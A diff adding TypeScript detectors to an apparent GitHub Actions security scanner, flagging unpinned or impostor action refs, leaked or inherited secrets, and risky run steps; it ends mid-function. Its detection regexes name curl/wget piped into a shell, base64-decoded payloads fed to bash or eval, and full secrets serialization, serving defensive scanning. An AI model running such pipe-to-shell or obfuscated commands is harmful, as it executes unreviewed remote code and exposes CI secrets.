0000000..d5dd813 --- /dev/null +++ b/src/layer2-static/detectors/workflow-impostor-commit.ts @@ -0,0 +1,170 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { RuntimeMode } from "../../config.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowImpostorCommitInput { + filePath: string; + parsed: unknown; + textContent: string; + runtimeMode?: RuntimeMode; +} + +interface ParsedUsesLine { + lineNumber: number; + column: number; + rawLine: string; + uses: string; +} + +const GITHUB_API_HEADERS = { + Accept: "application/vnd.github+json", +} as const; + +function splitOwnerRepo(slug: string): { owner: string; repo: string } | null { + const firstSlash = slug.indexOf("/"); + if (firstSlash < 0) { + return null; + } + + const owner = slug.slice(0, firstSlash); + const repo = slug.slice(firstSlash + 1).split("/")[0]; + if (!owner || !repo) { + return null; + } + + return { owner, repo }; +} + +function isPinnedToCommit(ref: string): boolean { + return /^[a-f0-9]{40}$/iu.test(ref.trim()); +} + +function parseRepositoryUses(value: string): { slug: string; ref: string } | null { + const trimmed = value.trim(); + if (trimmed.startsWith("./") || trimmed.startsWith("docker://")) { + return null; + } + + const atIndex = trimmed.lastIndexOf("@"); + if (atIndex < 0) { + return null; + } + + const slug = trimmed.slice(0, atIndex).trim().replace(/\/+$/u, "").toLowerCase(); + const ref = trimmed.slice(atIndex + 1).trim(); + if (!slug.includes("/") || ref.length === 0) { + return null; + } + + return { slug, ref }; +} + +function parseUsesLine(line: string, lineNumber: number): ParsedUsesLine | null { + const match = line.match(/^\s*(?:-\s*)?uses:\s*([^#]+?)(?:\s*#.*)?\s*$/iu); + if (!match?.[1]) { + return null; + } + + const uses = match[1].trim(); + const usesColumn = line.indexOf("uses:"); + return { + lineNumber, + column: usesColumn >= 0 ? usesColumn + 1 : 1, + rawLine: line, + uses, + }; +} + +async function fetchGitHubJson(url: string): Promise { + try { + const response = await fetch(url, { + headers: GITHUB_API_HEADERS, + }); + + if (!response.ok) { + return null; + } + + return (await response.json()) as unknown; + } catch { + return null; + } +} + +async function repositoryHasCommit(owner: string, repo: string, sha: string): Promise { + const url = `https://api.github.com/repos/${owner}/${repo}/commits/${encodeURIComponent(sha)}`; + const payload = (await fetchGitHubJson(url)) as { sha?: string } | null; + return typeof payload?.sha === "string" && payload.sha.length > 0; +} + +export async function detectWorkflowImpostorCommit( + input: WorkflowImpostorCommitInput, +): Promise { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + if (!extractWorkflowFacts(input.parsed)) { + return []; + } + + const mode = input.runtimeMode ?? "offline"; + if (mode !== "online") { + return []; + } + + const findings: Finding[] = []; + const lines = input.textContent.split(/\r?\n/u); + + for (const [index, line] of lines.entries()) { + const parsedLine = parseUsesLine(line, index + 1); + if (!parsedLine) { + continue; + } + + const parsedUses = parseRepositoryUses(parsedLine.uses); + if (!parsedUses || !isPinnedToCommit(parsedUses.ref)) { + continue; + } + + const ownerRepo = splitOwnerRepo(parsedUses.slug); + if (!ownerRepo) { + continue; + } + + if (await repositoryHasCommit(ownerRepo.owner, ownerRepo.repo, parsedUses.ref)) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [parsedLine.rawLine, parsedUses.ref, parsedUses.slug], + fallbackValue: parsedLine.rawLine.trim(), + }); + + findings.push({ + rule_id: "workflow-impostor-commit", + finding_id: `WORKFLOW_IMPOSTOR_COMMIT-${input.filePath}-${index + 1}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { line: parsedLine.lineNumber, column: parsedLine.column }, + description: "Pinned action commit is not present in the referenced repository", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Pin the action to a commit that exists in the referenced repository and review the upstream history before updating", + ], + evidence: evidence?.evidence ?? parsedLine.rawLine.trim(), + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-insecure-commands.ts b/src/layer2-static/detectors/workflow-insecure-commands.ts new file mode 100644 index 0000000..e589dcd --- /dev/null +++ b/src/layer2-static/detectors/workflow-insecure-commands.ts @@ -0,0 +1,92 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowInsecureCommandsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const INSECURE_COMMAND_PATTERNS: Array<{ pattern: RegExp; description: string }> = [ + { + pattern: /\b(?:curl|wget)\b[\s\S]*?\|\s*(?:sh|bash)\b/iu, + description: "remote download piped directly into a shell", + }, + { + pattern: /\bbash\s*<\s*\(\s*curl\b/iu, + description: "process substitution executes downloaded shell content", + }, + { + pattern: /\bsh\s*<\s*\(\s*curl\b/iu, + description: "process substitution executes downloaded shell content", + }, +]; + +function findInsecureCommand( + run: string | undefined, +): { match: string; description: string } | null { + if (typeof run !== "string") { + return null; + } + + for (const entry of INSECURE_COMMAND_PATTERNS) { + if (entry.pattern.test(run)) { + return { match: run, description: entry.description }; + } + } + + return null; +} + +export function detectWorkflowInsecureCommands(input: WorkflowInsecureCommandsInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + const insecure = findInsecureCommand(step.run); + if (!insecure) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [insecure.match], + fallbackValue: insecure.match, + }); + + findings.push({ + rule_id: "workflow-insecure-commands", + finding_id: `WORKFLOW_INSECURE_COMMANDS-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "COMMAND_EXEC", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].run` }, + description: `Workflow uses ${insecure.description}`, + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-78", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Download artifacts separately, verify integrity, and run them only after review", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-known-vuln-action.ts b/src/layer2-static/detectors/workflow-known-vuln-action.ts new file mode 100644 index 0000000..d28dfce --- /dev/null +++ b/src/layer2-static/detectors/workflow-known-vuln-action.ts @@ -0,0 +1,89 @@ +import type { RuntimeMode } from "../../config.js"; +import type { Finding } from "../../types/finding.js"; +import { loadKnownVulnerableActions } from "../advisories/gha-advisory-client.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowKnownVulnActionInput { + filePath: string; + parsed: unknown; + runtimeMode?: RuntimeMode; +} + +function parseRepositoryUses(value: string): { slug: string; ref: string } | null { + const trimmed = value.trim(); + if (trimmed.startsWith("./") || trimmed.startsWith("docker://")) { + return null; + } + + const atIndex = trimmed.lastIndexOf("@"); + if (atIndex < 0) { + return null; + } + + const slug = trimmed.slice(0, atIndex).toLowerCase(); + const ref = trimmed.slice(atIndex + 1).toLowerCase(); + if (!slug.includes("/") || ref.length === 0) { + return null; + } + + return { slug, ref }; +} + +export function detectWorkflowKnownVulnAction(input: WorkflowKnownVulnActionInput): Finding[] { + if (input.runtimeMode !== "online") { + return []; + } + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const advisories = loadKnownVulnerableActions({ runtimeMode: input.runtimeMode }).advisories; + const findings: Finding[] = []; + + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + const uses = step.uses; + if (!uses) { + return; + } + const parsedUses = parseRepositoryUses(uses); + if (!parsedUses) { + return; + } + + const vulnerableVersions = advisories[parsedUses.slug]; + if (!vulnerableVersions || !vulnerableVersions.includes(parsedUses.ref)) { + return; + } + + findings.push({ + rule_id: "workflow-known-vuln-action", + finding_id: `WORKFLOW_KNOWN_VULN_ACTION-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_VULNERABLE_ACTION", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].uses` }, + description: `Action ${parsedUses.slug}@${parsedUses.ref} is listed in known vulnerable references`, + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-937", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Upgrade to a non-vulnerable action release and pin to a reviewed commit SHA", + ], + evidence: uses, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-misfeature.ts b/src/layer2-static/detectors/workflow-misfeature.ts new file mode 100644 index 0000000..57c1d07 --- /dev/null +++ b/src/layer2-static/detectors/workflow-misfeature.ts @@ -0,0 +1,132 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowMisfeatureInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +interface StepCandidate { + jobId: string; + stepIndex: number; + name?: string; + run?: string; + uses?: string; + continueOnError: boolean; +} + +const SECURITY_TOKENS = [ + "codeql", + "security", + "sast", + "secret", + "dependency review", + "npm audit", + "trivy", +]; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function isContinueOnErrorEnabled(value: unknown): boolean { + if (value === true) { + return true; + } + return typeof value === "string" && value.trim().toLowerCase() === "true"; +} + +function isSecurityStep(candidate: StepCandidate): boolean { + const combined = [candidate.name, candidate.run, candidate.uses] + .filter((value): value is string => typeof value === "string") + .join(" ") + .toLowerCase(); + return SECURITY_TOKENS.some((token) => combined.includes(token)); +} + +function gatherCandidates(parsed: unknown): StepCandidate[] { + const root = asRecord(parsed); + const jobs = asRecord(root?.jobs); + if (!jobs) { + return []; + } + + const candidates: StepCandidate[] = []; + for (const [jobId, jobValue] of Object.entries(jobs)) { + const job = asRecord(jobValue); + const steps = Array.isArray(job?.steps) ? job.steps : []; + steps.forEach((stepValue, stepIndex) => { + const step = asRecord(stepValue); + if (!step) { + return; + } + candidates.push({ + jobId, + stepIndex, + name: typeof step.name === "string" ? step.name : undefined, + run: typeof step.run === "string" ? step.run : undefined, + uses: typeof step.uses === "string" ? step.uses : undefined, + continueOnError: isContinueOnErrorEnabled(step["continue-on-error"]), + }); + }); + } + + return candidates; +} + +export function detectWorkflowMisfeature(input: WorkflowMisfeatureInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + for (const candidate of gatherCandidates(input.parsed)) { + if (!candidate.continueOnError || !isSecurityStep(candidate)) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: ["continue-on-error: true", candidate.run ?? "", candidate.name ?? ""], + fallbackValue: "security step continues on error", + }); + + findings.push({ + rule_id: "workflow-misfeature", + finding_id: `WORKFLOW_MISFEATURE-${input.filePath}-${candidate.jobId}-${candidate.stepIndex}`, + severity: "MEDIUM", + category: "CI_TRIGGER", + layer: "L2", + file_path: input.filePath, + location: { + field: `jobs.${candidate.jobId}.steps[${candidate.stepIndex}].continue-on-error`, + }, + description: + "Security-relevant step is configured with continue-on-error, which can hide failed checks", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-703", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Remove continue-on-error from security-critical steps or split non-blocking diagnostics into separate jobs", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-obfuscation.ts b/src/layer2-static/detectors/workflow-obfuscation.ts new file mode 100644 index 0000000..16673b9 --- /dev/null +++ b/src/layer2-static/detectors/workflow-obfuscation.ts @@ -0,0 +1,94 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowObfuscationInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const OBFUSCATION_PATTERNS: Array<{ pattern: RegExp; description: string }> = [ + { + pattern: /\bbase64\s+-d\b/iu, + description: "runtime decoding of base64-encoded payload data", + }, + { + pattern: /\bbase64\s+-d\b[\s\S]*\|\s*(?:bash|sh)\b/iu, + description: "base64-decoded payload piped into a shell", + }, + { + pattern: /\beval\b[\s\S]*\$\([^)]+base64[^)]*\)/iu, + description: "eval executes command substitution that decodes base64 content", + }, + { + pattern: /\bprintf\b[\s\S]*\\x[0-9a-f]{2}/iu, + description: "hex-encoded shell payload reconstruction", + }, +]; + +function detectObfuscation(run: string | undefined): { run: string; description: string } | null { + if (!run) { + return null; + } + for (const entry of OBFUSCATION_PATTERNS) { + if (entry.pattern.test(run)) { + return { + run, + description: entry.description, + }; + } + } + return null; +} + +export function detectWorkflowObfuscation(input: WorkflowObfuscationInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + facts.jobs.forEach((job, jobIndex) => { + job.steps.forEach((step, stepIndex) => { + const match = detectObfuscation(step.run); + if (!match) { + return; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [match.run, "base64", "eval"], + fallbackValue: match.run, + }); + + findings.push({ + rule_id: "workflow-obfuscation", + finding_id: `WORKFLOW_OBFUSCATION-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "COMMAND_EXEC", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].run` }, + description: `Workflow run step uses obfuscated command execution (${match.description})`, + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-506", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Replace obfuscated command pipelines with explicit, reviewable commands and integrity checks", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-overprovisioned-secrets.ts b/src/layer2-static/detectors/workflow-overprovisioned-secrets.ts new file mode 100644 index 0000000..d481ccc --- /dev/null +++ b/src/layer2-static/detectors/workflow-overprovisioned-secrets.ts @@ -0,0 +1,106 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowOverprovisionedSecretsInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const FULL_SECRETS_SERIALIZATION = /\btojson\s*\(\s*secrets\s*\)/iu; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function appendPath(base: string, segment: string | number): string { + if (typeof segment === "number") { + return `${base}[${segment}]`; + } + return base.length > 0 ? `${base}.${segment}` : segment; +} + +function findSerializedSecrets( + value: unknown, + path: string, +): { path: string; value: string } | null { + if (typeof value === "string") { + return FULL_SECRETS_SERIALIZATION.test(value) ? { path, value } : null; + } + + if (Array.isArray(value)) { + for (let index = 0; index < value.length; index += 1) { + const found = findSerializedSecrets(value[index], appendPath(path, index)); + if (found) { + return found; + } + } + return null; + } + + const record = asRecord(value); + if (!record) { + return null; + } + + for (const [key, child] of Object.entries(record)) { + const found = findSerializedSecrets(child, appendPath(path, key)); + if (found) { + return found; + } + } + + return null; +} + +export function detectWorkflowOverprovisionedSecrets( + input: WorkflowOverprovisionedSecretsInput, +): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const found = findSerializedSecrets(input.parsed, ""); + if (!found) { + return []; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [found.value, "toJSON(secrets)", "toJson(secrets)"], + fallbackValue: found.value, + }); + + return [ + { + rule_id: "workflow-overprovisioned-secrets", + finding_id: `WORKFLOW_OVERPROVISIONED_SECRETS-${input.filePath}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: found.path }, + description: "Workflow serializes the entire secrets context", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-200", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Reference only the specific secrets each step needs instead of serializing the full secrets context", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }, + ]; +} diff --git a/src/layer2-static/detectors/workflow-ref-confusion.ts b/src/layer2-static/detectors/workflow-ref-confusion.ts new file mode 100644 index 0000000..7c5bb54 --- /dev/null +++ b/src/layer2-static/detectors/workflow-ref-confusion.ts @@ -0,0 +1,91 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowRefConfusionInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const HASH_PINNED_REF_RE = /^[a-f0-9]{40}$/iu; + +function parseRepositoryUses(value: string): { slug: string; ref: string } | null { + const trimmed = value.trim(); + if (trimmed.startsWith("./") || trimmed.startsWith("docker://")) { + return null; + } + + const atIndex = trimmed.lastIndexOf("@"); + if (atIndex < 0) { + return null; + } + + const slug = trimmed.slice(0, atIndex).trim().replace(/\/+$/u, "").toLowerCase(); + const ref = trimmed.slice(atIndex + 1).trim(); + if (slug.length === 0 || !slug.includes("/") || ref.length === 0) { + return null; + } + + return { slug, ref }; +} + +function isHashPinned(ref: string): boolean { + return HASH_PINNED_REF_RE.test(ref.trim()); +} + +export function detectWorkflowRefConfusion(input: WorkflowRefConfusionInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + if (!facts) { + return []; + } + + const findings: Finding[] = []; + + for (const [jobIndex, job] of facts.jobs.entries()) { + for (const [stepIndex, step] of job.steps.entries()) { + const uses = step.uses?.trim(); + if (!uses) { + continue; + } + + const parsedUses = parseRepositoryUses(uses); + if (!parsedUses || isHashPinned(parsedUses.ref)) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [uses], + fallbackValue: `uses: ${uses}`, + }); + + findings.push({ + rule_id: "workflow-ref-confusion", + finding_id: `WORKFLOW_REF_CONFUSION-${input.filePath}-${jobIndex}-${stepIndex}`, + severity: "HIGH", + category: "CI_VULNERABLE_ACTION", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.steps[${stepIndex}].uses` }, + description: + "Workflow action is pinned to a symbolic ref instead of an immutable commit hash", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: ["Pin external actions to a full commit SHA"], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-ref-version-mismatch.ts b/src/layer2-static/detectors/workflow-ref-version-mismatch.ts new file mode 100644 index 0000000..bfa4573 --- /dev/null +++ b/src/layer2-static/detectors/workflow-ref-version-mismatch.ts @@ -0,0 +1,251 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { RuntimeMode } from "../../config.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowRefVersionMismatchInput { + filePath: string; + parsed: unknown; + textContent: string; + runtimeMode?: RuntimeMode; +} + +const VERSION_COMMENT_PATTERNS = [ + /#\s*tag\s*=\s*(v\d+(?:\.\d+)*(?:\.\d+)?)/iu, + /#\s*(v\d+(?:\.\d+)*(?:\.\d+)?)/iu, + /#\s*tag\s*=\s*(\d+(?:\.\d+)*(?:\.\d+)?)/iu, + /#\s*(?:version|ver)\s*[:=]\s*(v?\d+(?:\.\d+)*(?:\.\d+)?)/iu, +]; +const GITHUB_API_HEADERS = { + Accept: "application/vnd.github+json", +} as const; +const MAX_TAG_DEPTH = 8; + +interface ParsedUsesLine { + lineNumber: number; + column: number; + rawLine: string; + uses: string; + versionComment: string; +} + +function splitOwnerRepo(slug: string): { owner: string; repo: string } | null { + const firstSlash = slug.indexOf("/"); + if (firstSlash < 0) { + return null; + } + + const owner = slug.slice(0, firstSlash); + const repo = slug.slice(firstSlash + 1).split("/")[0]; + if (!owner || !repo) { + return null; + } + + return { owner, repo }; +} + +function isPinnedToCommit(ref: string): boolean { + return /^[a-f0-9]{40}$/iu.test(ref.trim()); +} + +function parseRepositoryUses(value: string): { slug: string; ref: string } | null { + const trimmed = value.trim(); + if (trimmed.startsWith("./") || trimmed.startsWith("docker://")) { + return null; + } + + const atIndex = trimmed.lastIndexOf("@"); + if (atIndex < 0) { + return null; + } + + const slug = trimmed.slice(0, atIndex).trim().replace(/\/+$/u, "").toLowerCase(); + const ref = trimmed.slice(atIndex + 1).trim(); + if (!slug.includes("/") || ref.length === 0) { + return null; + } + + return { slug, ref }; +} + +function extractVersionComment(line: string): string | null { + for (const pattern of VERSION_COMMENT_PATTERNS) { + const match = line.match(pattern); + if (match?.[1]) { + return match[1]; + } + } + + return null; +} + +function parseUsesLine(line: string, lineNumber: number): ParsedUsesLine | null { + const match = line.match(/^\s*(?:-\s*)?uses:\s*([^#]+?)(?:\s*#\s*(.+))?\s*$/iu); + if (!match?.[1]) { + return null; + } + + const uses = match[1].trim(); + const versionComment = extractVersionComment(line); + if (!versionComment) { + return null; + } + + const usesColumn = line.indexOf("uses:"); + return { + lineNumber, + column: usesColumn >= 0 ? usesColumn + 1 : 1, + rawLine: line, + uses, + versionComment, + }; +} + +async function fetchGitHubJson(url: string): Promise { + try { + const response = await fetch(url, { + headers: GITHUB_API_HEADERS, + }); + + if (!response.ok) { + return null; + } + + return (await response.json()) as unknown; + } catch { + return null; + } +} + +async function resolveTagCommitSha( + owner: string, + repo: string, + tag: string, +): Promise { + const normalizedTag = tag.trim(); + if (normalizedTag.length === 0) { + return null; + } + + const refUrl = `https://api.github.com/repos/${owner}/${repo}/git/ref/tags/${encodeURIComponent( + normalizedTag, + )}`; + const ref = (await fetchGitHubJson(refUrl)) as { + object?: { type?: string; sha?: string }; + } | null; + if (!ref?.object?.sha || !ref.object.type) { + return null; + } + + if (ref.object.type === "commit") { + return ref.object.sha; + } + + if (ref.object.type !== "tag") { + return null; + } + + const seenObjects = new Set([ref.object.sha]); + let tagObjectSha = ref.object.sha; + + for (let depth = 0; depth < MAX_TAG_DEPTH; depth += 1) { + const tagUrl = `https://api.github.com/repos/${owner}/${repo}/git/tags/${tagObjectSha}`; + const tagObject = (await fetchGitHubJson(tagUrl)) as { + object?: { type?: string; sha?: string }; + } | null; + + if (!tagObject?.object?.sha || !tagObject.object.type) { + return null; + } + + if (tagObject.object.type === "commit") { + return tagObject.object.sha; + } + + if (tagObject.object.type !== "tag" || seenObjects.has(tagObject.object.sha)) { + return null; + } + + seenObjects.add(tagObject.object.sha); + tagObjectSha = tagObject.object.sha; + } + + return null; +} + +export async function detectWorkflowRefVersionMismatch( + input: WorkflowRefVersionMismatchInput, +): Promise { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + if (!extractWorkflowFacts(input.parsed)) { + return []; + } + + const mode = input.runtimeMode ?? "offline"; + if (mode !== "online") { + return []; + } + + const findings: Finding[] = []; + const lines = input.textContent.split(/\r?\n/u); + + for (const [index, line] of lines.entries()) { + const parsedLine = parseUsesLine(line, index + 1); + if (!parsedLine) { + continue; + } + + const parsedUses = parseRepositoryUses(parsedLine.uses); + if (!parsedUses || !isPinnedToCommit(parsedUses.ref)) { + continue; + } + + const ownerRepo = splitOwnerRepo(parsedUses.slug); + if (!ownerRepo) { + continue; + } + + const matchedCommit = await resolveTagCommitSha( + ownerRepo.owner, + ownerRepo.repo, + parsedLine.versionComment, + ); + + if (!matchedCommit || matchedCommit === parsedUses.ref) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [parsedLine.rawLine, parsedLine.versionComment, parsedUses.ref], + fallbackValue: parsedLine.rawLine.trim(), + }); + + findings.push({ + rule_id: "workflow-ref-version-mismatch", + finding_id: `WORKFLOW_REF_VERSION_MISMATCH-${input.filePath}-${index + 1}`, + severity: "MEDIUM", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { line: parsedLine.lineNumber, column: parsedLine.column }, + description: "Hash-pinned action commit does not match its version comment tag", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-829", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Update the version comment to match the pinned commit or repin the action to the intended release tag", + ], + evidence: evidence?.evidence ?? parsedLine.rawLine.trim(), + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-secrets-inherit.ts b/src/layer2-static/detectors/workflow-secrets-inherit.ts new file mode 100644 index 0000000..89cddc9 --- /dev/null +++ b/src/layer2-static/detectors/workflow-secrets-inherit.ts @@ -0,0 +1,78 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowSecretsInheritInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function isReusableWorkflowCall(uses: unknown): uses is string { + return typeof uses === "string" && uses.includes("/.github/workflows/"); +} + +function isInheritSecrets(value: unknown): boolean { + return typeof value === "string" && value.trim().toLowerCase() === "inherit"; +} + +export function detectWorkflowSecretsInherit(input: WorkflowSecretsInheritInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + const root = asRecord(input.parsed); + const jobsRecord = asRecord(root?.jobs); + if (!facts || !jobsRecord) { + return []; + } + + const findings: Finding[] = []; + + for (const job of facts.jobs) { + const jobRecord = asRecord(jobsRecord[job.id]); + if ( + !jobRecord || + !isReusableWorkflowCall(jobRecord.uses) || + !isInheritSecrets(jobRecord.secrets) + ) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: ["secrets: inherit", "inherit"], + fallbackValue: "secrets: inherit", + }); + + findings.push({ + rule_id: "workflow-secrets-inherit", + finding_id: `WORKFLOW_SECRETS_INHERIT-${input.filePath}-${job.id}`, + severity: "HIGH", + category: "CI_PERMISSIONS", + layer: "L2", + file_path: input.filePath, + location: { field: `jobs.${job.id}.secrets` }, + description: "Reusable workflow call inherits all repository secrets", + affected_tools: ["github-actions"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-200", + confidence: "HIGH", + fixable: false, + remediation_actions: ["Pass only the specific secrets required by the reusable workflow"], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + } + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-secrets-outside-env.ts b/src/layer2-static/detectors/workflow-secrets-outside-env.ts new file mode 100644 index 0000000..3ac8a98 --- /dev/null +++ b/src/layer2-static/detectors/workflow-secrets-outside-env.ts @@ -0,0 +1,124 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractWorkflowFacts, isGitHubWorkflowPath } from "../workflow/parser.js"; + +export interface WorkflowSecretsOutsideEnvInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +const DIRECT_SECRET_REFERENCE = /\bsecrets\.(?!GITHUB_TOKEN\b)[A-Za-z0-9_]+\b/iu; +const BRACKET_SECRET_REFERENCE = /\bsecrets\s*\[\s*['"][^'"\r\n]+['"]\s*\]/iu; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function appendPath(base: string, segment: string | number): string { + if (typeof segment === "number") { + return `${base}[${segment}]`; + } + return base.length > 0 ? `${base}.${segment}` : segment; +} + +function findSecretReference(value: unknown, path: string): { path: string; value: string } | null { + if (typeof value === "string") { + return DIRECT_SECRET_REFERENCE.test(value) || BRACKET_SECRET_REFERENCE.test(value) + ? { path, value } + : null; + } + + if (Array.isArray(value)) { + for (let index = 0; index < value.length; index += 1) { + const found = findSecretReference(value[index], appendPath(path, index)); + if (found) { + return found; + } + } + return null; + } + + const record = asRecord(value); + if (!record) { + return null; + } + + for (const [key, child] of Object.entries(record)) { + const found = findSecretReference(child, appendPath(path, key)); + if (found) { + return found; + } + } + + return null; +} + +function hasDedicatedEnvironment(job: Record): boolean { + const environment = job.environment; + if (typeof environment === "string") { + return environment.trim().length > 0; + } + + return environment !== undefined && environment !== null; +} + +export function detectWorkflowSecretsOutsideEnv(input: WorkflowSecretsOutsideEnvInput): Finding[] { + if (!isGitHubWorkflowPath(input.filePath)) { + return []; + } + + const facts = extractWorkflowFacts(input.parsed); + const root = asRecord(input.parsed); + const jobsRecord = asRecord(root?.jobs); + if (!facts || !jobsRecord) { + return []; + } + + const findings: Finding[] = []; + + for (const job of facts.jobs) { + const jobRecord = asRecord(jobsRecord[job.id]); + if (!jobRecord || hasDedicatedEnvironment(jobRecord)) { + continue; + } + + const found = findSecretReference(jobRecord, `jobs.${job.id}`); + if (!found) { + continue; + } + + const evidence = buildFindingEvidence({ + textContent: input.textContent, + 